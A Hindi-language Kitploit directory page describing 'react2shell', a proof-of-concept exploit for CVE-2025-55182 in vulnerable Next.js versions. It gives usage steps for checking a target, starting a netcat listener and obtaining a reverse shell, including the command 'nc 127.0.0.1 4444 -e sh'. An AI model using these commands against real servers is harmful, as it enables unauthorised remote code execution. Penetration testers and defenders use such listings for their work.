Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react2shell — PoC for React2Shell (CVE-2025-55182) | Kitploit
उपकरण/GitHubGitHub/xkey8/react2shell
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubxkey8/react2shell

react2shell

PoC for React2Shell (CVE-2025-55182)

रिपॉजिटरी देखें
18 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

React2Shell

CVE-2025-55182 अप्रमाणित दूरस्थ कोड निष्पादन भेद्यता (उर्फ React2Shell) के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट। यह स्क्रिप्ट Next.js के निम्नलिखित संस्करणों पर शेल प्राप्त करने के लिए उपयोग की जाती है;

  • 15.0.4 और नीचे
  • 15.1.8 और नीचे
  • 15.2.5 और नीचे
  • 15.3.5 और नीचे
  • 15.4.7 और नीचे
  • 15.5.6 और नीचे
  • 16.0.6 और नीचे
  • 14.3.0-canary.77 और बाद के रिलीज़

इसका परीक्षण केवल संस्करण 16.0.6 पर किया गया है।

उपयोग

root@kitploit:~
$ ./react2shell.py --help
d8888b. d88888b  .d8b.   .o88b. d888888b .d888b. .d8888. db   db d88888b db      db
88  `8D 88'     d8' `8b d8P  Y8 `~~88~~' VP  `8D 88'  YP 88   88 88'     88      88
88oobY' 88ooooo 88ooo88 8P         88       odD' `8bo.   88ooo88 88ooooo 88      88
88`8b   88~~~~~ 88~~~88 8b         88     .88'     `Y8b. 88~~~88 88~~~~~ 88      88
88 `88. 88.     88   88 Y8b  d8    88    j88.    db   8D 88   88 88.     88booo. 88booo.
88   YD Y88888P YP   YP  `Y88P'    YP    888888D `8888Y' YP   YP Y88888P Y88888P Y88888P

usage: react2shell [-h] -u URL -i IP -p PORT

options:
  -h, --help       show this help message and exit
  -u, --url URL    Target URL
  -i, --ip IP      Attacker IP
  -p, --port PORT  Attacker port

जांचें कि लक्ष्य असुरक्षित है या नहीं;

root@kitploit:~
./react2shell.py -u http://127.0.0.1:3000

एक लिसनर शुरू करें;

root@kitploit:~
$ nc -lvp 4444

एक शेल शुरू करें;

root@kitploit:~
$ ./react2shell.py -u http://127.0.0.1:3000 -i 127.0.0.1 -p 4444
$ ./react2shell.py -u http://127.0.0.1:3000 -c 'nc 127.0.0.1 4444 -e sh' # you can also provide a command


संदर्भ

  • https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
  • https://nvd.nist.gov/vuln/detail/CVE-2025-55182
  • https://nextjs.org/blog/CVE-2025-66478
  • https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
टूल डाउनलोड करें